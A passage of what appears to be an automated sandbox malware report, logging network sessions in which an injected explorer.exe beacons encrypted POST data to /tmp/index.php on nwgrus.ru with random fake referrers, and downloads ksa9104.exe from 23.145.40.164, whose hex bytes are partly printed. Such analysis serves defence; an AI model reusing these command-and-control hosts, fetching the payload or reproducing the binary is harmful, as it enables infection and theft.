                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://blfmqjnqqyje.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 365
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:38:26.998467922 CEST365OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 5a 3f b7 8b
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vuZ?q<[J6|u$K(*Zn$K2.$K]+!a.- !\0u&%XM(0KJhH{zM?.{
                                                                                                                                                              Sep 30, 2024 15:38:27.980511904 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:38:27 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              30192.168.2.849751187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:39:33.966938019 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://gieuyuggiqfgtm.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 180
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:39:33.966985941 CEST180OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 65 2e ee 8f
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA .[k,vue.b.f^eJmzj2r/98T:8v+(Y;qL>3O
                                                                                                                                                              Sep 30, 2024 15:39:34.947253942 CEST151INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:39:34 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                                                                                                              Data Ascii: r


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              31192.168.2.849752187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:39:35.766473055 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://eankyeljcevd.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 236
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:39:35.766506910 CEST236OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 67 26 ba f2
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA .[k,vug&dlMc2HH9ynf!>QxqJ\(+!.:kMjE^/2_'dFH6w=0^0Ms}hB7kbm
                                                                                                                                                              Sep 30, 2024 15:39:36.911855936 CEST151INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:39:36 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                                                                                                              Data Ascii: r


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              32192.168.2.849753187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:39:39.439867973 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://luejdvwxxrcvrqdh.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 221
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:39:39.440026045 CEST221OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 75 17 d1 b9
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA .[k,vuuLlYsgv;`(QvD*nQT7t28`M_=a5`EKzunBiWE%G2H
                                                                                                                                                              Sep 30, 2024 15:39:40.478954077 CEST151INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:39:40 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                                                                                                              Data Ascii: r


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              33192.168.2.849754187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:39:46.696904898 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://svfopofgftavf.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 294
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:39:46.696937084 CEST294OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4d 21 a4 fc
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA .[k,vuM!R>ENh\fVx?*NM0suQe,9BUB4D]UU[!YG6~4e6r;jFHW:gNk%XvFv@*
                                                                                                                                                              Sep 30, 2024 15:39:47.649435043 CEST151INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:39:47 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                                                                                                              Data Ascii: r


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              34192.168.2.849755187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:39:56.152930975 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://bprjpwpsmmrgaa.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 313
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:39:56.152930975 CEST313OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 74 3b e5 e4
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA .[k,vut;x`RkFiL#A t7v[_-9/Tv'Zg2Rg2nL!5yM@q^wWdyyQi6v
                                                                                                                                                              Sep 30, 2024 15:39:57.130166054 CEST151INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:39:56 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                                                                                                              Data Ascii: r


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              35192.168.2.849756187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:40:08.768022060 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://ocnxfkuqumobjmad.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 111
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:40:08.768075943 CEST111OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4e 33 fa a7
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA .[k,vuN3nudkHUm]
                                                                                                                                                              Sep 30, 2024 15:40:09.910373926 CEST151INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:40:09 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                                                                                                              Data Ascii: r


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              36192.168.2.849758109.121.204.14804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:40:23.506861925 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://dxdhacbibrdlwrt.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 291
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:40:23.508078098 CEST291OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 55 5c f8 87
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA .[k,vuU\likO6InHV8er{,W)_Q,GwBZ;GveYEfyTbOJRqQS~4~nFxn8r7>F4"
                                                                                                                                                              Sep 30, 2024 15:40:24.269634962 CEST151INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:40:24 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                                                                                                              Data Ascii: r


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              37192.168.2.849760109.121.204.14804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:40:45.417623043 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://nlmsxhroxptelhd.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 123
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:40:45.417640924 CEST123OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 29 20 bd aa
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA .[k,vu) HcfNC?>c[Fi
                                                                                                                                                              Sep 30, 2024 15:40:46.200867891 CEST151INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:40:46 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                                                                                                              Data Ascii: r


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              38192.168.2.849762109.121.204.14804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:41:08.384318113 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://hikneccvvrshgb.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 349
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:41:08.384341002 CEST349OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 65 56 fc e3
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA .[k,vueVUD~,'(}?lblV,=6xfCQu'otl6oA\Rc\^Q9U+Q2gt]!ou}m-
                                                                                                                                                              Sep 30, 2024 15:41:09.207103014 CEST151INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:41:09 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                                                                                                              Data Ascii: r


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              0192.168.2.84972623.145.40.1644434084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-09-30 13:38:13 UTC162OUTGET /ksa9104.exe HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Host: 23.145.40.164
                                                                                                                                                              2024-09-30 13:38:14 UTC327INHTTP/1.1 200 OK
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:38:14 GMT
                                                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              Last-Modified: Mon, 30 Sep 2024 13:00:02 GMT
                                                                                                                                                              ETag: "3be00-62355c8712010"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Content-Length: 245248
                                                                                                                                                              Connection: close
                                                                                                                                                              Content-Type: application/x-msdos-program
                                                                                                                                                              2024-09-30 13:38:14 UTC7865INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 d2 fc 49 43 b3 92 1a 43 b3 92 1a 43 b3 92 1a 5d e1 16 1a 5f b3 92 1a 5d e1 07 1a 50 b3 92 1a 5d e1 11 1a 1f b3 92 1a 64 75 e9 1a 44 b3 92 1a 43 b3 93 1a 32 b3 92 1a 5d e1 18 1a 42 b3 92 1a 5d e1 06 1a 42 b3 92 1a 5d e1 03 1a 42 b3 92 1a 52 69 63 68 43 b3 92 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 eb 99 1f 65 00 00 00
                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ICCC]_]P]duDC2]B]B]BRichCPELe
                                                                                                                                                              2024-09-30 13:38:15 UTC8000INData Raw: 04 85 c0 75 24 a1 f0 90 41 00 a3 d0 db 41 00 a1 fc 90 41 00 c7 05 cc db 41 00 17 27 40 00 89 35 d4 db 41 00 a3 d8 db 41 00 ff 15 f4 90 41 00 a3 ac c2 41 00 83 f8 ff 0f 84 cc 00 00 00 ff 35 d0 db 41 00 50 ff d6 85 c0 0f 84 bb 00 00 00 e8 27 05 00 00 ff 35 cc db 41 00 e8 13 fb ff ff ff 35 d0 db 41 00 a3 cc db 41 00 e8 03 fb ff ff ff 35 d4 db 41 00 a3 d0 db 41 00 e8 f3 fa ff ff ff 35 d8 db 41 00 a3 d4 db 41 00 e8 e3 fa ff ff 83 c4 10 a3 d8 db 41 00 e8 5d eb ff ff 85 c0 74 65 68 0b 29 40 00 ff 35 cc db 41 00 e8 3d fb ff ff 59 ff d0 a3 a8 c2 41 00 83 f8 ff 74 48 68 14 02 00 00 6a 01 e8 8b 00 00 00 8b f0 59 59 85 f6 74 34 56 ff 35 a8 c2 41 00 ff 35 d4 db 41 00 e8 0a fb ff ff 59 ff d0 85 c0 74 1b 6a 00 56 e8 e7 fb ff ff 59 59 ff 15 08 91 41 00 83 4e 04 ff 89 06
                                                                                                                                                              Data Ascii: u$AAAA'@5AAAA5AP'5A5AA5AA5AAA]teh)@5A=YAtHhjYYt4V5A5AYtjVYYAN
                                                                                                                                                              2024-09-30 13:38:15 UTC8000INData Raw: 56 5c a1 9c c9 41 00 57 8b 7d 08 8b ca 53 39 39 74 0e 8b d8 6b db 0c 83 c1 0c 03 da 3b cb 72 ee 6b c0 0c 03 c2 3b c8 73 08 39 39 75 04 8b c1 eb 02 33 c0 85 c0 74 0a 8b 58 08 89 5d fc 85 db 75 07 33 c0 e9 fb 00 00 00 83 fb 05 75 0c 83 60 08 00 33 c0 40 e9 ea 00 00 00 83 fb 01 0f 84 de 00 00 00 8b 4e 60 89 4d f8 8b 4d 0c 89 4e 60 8b 48 04 83 f9 08 0f 85 b8 00 00 00 8b 0d 90 c9 41 00 8b 3d 94 c9 41 00 8b d1 03 f9 3b d7 7d 24 6b c9 0c 8b 7e 5c 83 64 39 08 00 8b 3d 90 c9 41 00 8b 1d 94 c9 41 00 42 03 df 83 c1 0c 3b d3 7c e2 8b 5d fc 8b 00 8b 7e 64 3d 8e 00 00 c0 75 09 c7 46 64 83 00 00 00 eb 5e 3d 90 00 00 c0 75 09 c7 46 64 81 00 00 00 eb 4e 3d 91 00 00 c0 75 09 c7 46 64 84 00 00 00 eb 3e 3d 93 00 00 c0 75 09 c7 46 64 85 00 00 00 eb 2e 3d 8d 00 00 c0 75 09 c7
                                                                                                                                                              Data Ascii: V\AW}S99tk;rk;s99u3tX]u3u`3@N`MMN`HA=A;}$k~\d9=AAB;|]~d=uFd^=uFdN=uFd>=uFd.=u
                                                                                                                                                              2024-09-30 13:38:15 UTC8000INData Raw: f3 74 07 8b 7d 0c 3b fb 77 1b e8 26 ad ff ff 6a 16 5e 89 30 53 53 53 53 53 e8 b3 d6 ff ff 83 c4 14 8b c6 eb d5 39 5d 14 75 04 88 1e eb ca 8b 55 10 3b d3 75 04 88 1e eb d1 83 7d 14 ff 8b c6 75 0f 8a 0a 88 08 40 42 3a cb 74 1e 4f 75 f3 eb 19 8a 0a 88 08 40 42 3a cb 74 08 4f 74 05 ff 4d 14 75 ee 39 5d 14 75 02 88 18 3b fb 75 8b 83 7d 14 ff 75 0f 8b 45 0c 6a 50 88 5c 06 ff 58 e9 78 ff ff ff 88 1e e8 ac ac ff ff 6a 22 59 89 08 8b f1 eb 82 8b ff 55 8b ec 8b 4d 08 53 33 db 56 57 3b cb 74 07 8b 7d 0c 3b fb 77 1b e8 86 ac ff ff 6a 16 5e 89 30 53 53 53 53 53 e8 13 d6 ff ff 83 c4 14 8b c6 eb 30 8b 75 10 3b f3 75 04 88 19 eb da 8b d1 8a 06 88 02 42 46 3a c3 74 03 4f 75 f3 3b fb 75 10 88 19 e8 4b ac ff ff 6a 22 59 89 08 8b f1 eb c1 33 c0 5f 5e 5b 5d c3 cc cc cc cc cc
                                                                                                                                                              Data Ascii: t};w&j^0SSSSS9]uU;u}u@B:tOu@B:tOtMu9]u;u}uEjP\Xxj"YUMS3VW;t};wj^0SSSSS0u;uBF:tOu;uKj"Y3_^[]
                                                                                                                                                              2024-09-30 13:38:15 UTC8000INData Raw: 89 01 41 41 46 46 66 3b c7 74 03 4b 75 ee 33 c0 3b df 75 d3 66 89 02 e8 d9 8d ff ff 6a 22 59 89 08 8b f1 eb b3 8b ff 55 8b ec 8b 45 08 66 8b 08 40 40 66 85 c9 75 f6 2b 45 08 d1 f8 48 5d c3 55 8b ec 83 ec 08 89 7d fc 89 75 f8 8b 75 0c 8b 7d 08 8b 4d 10 c1 e9 07 eb 06 8d 9b 00 00 00 00 66 0f 6f 06 66 0f 6f 4e 10 66 0f 6f 56 20 66 0f 6f 5e 30 66 0f 7f 07 66 0f 7f 4f 10 66 0f 7f 57 20 66 0f 7f 5f 30 66 0f 6f 66 40 66 0f 6f 6e 50 66 0f 6f 76 60 66 0f 6f 7e 70 66 0f 7f 67 40 66 0f 7f 6f 50 66 0f 7f 77 60 66 0f 7f 7f 70 8d b6 80 00 00 00 8d bf 80 00 00 00 49 75 a3 8b 75 f8 8b 7d fc 8b e5 5d c3 55 8b ec 83 ec 1c 89 7d f4 89 75 f8 89 5d fc 8b 5d 0c 8b c3 99 8b c8 8b 45 08 33 ca 2b ca 83 e1 0f 33 ca 2b ca 99 8b f8 33 fa 2b fa 83 e7 0f 33 fa 2b fa 8b d1 0b d7 75 4a
                                                                                                                                                              Data Ascii: AAFFf;tKu3;ufj"YUEf@@fu+EH]U}uu}MfofoNfoV fo^0ffOfW f_0fof@fonPfov`fo~pfg@foPfw`fpIuu}]U}u]]E3+3+3+3+uJ
                                                                                                                                                              2024-09-30 13:38:15 UTC8000INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
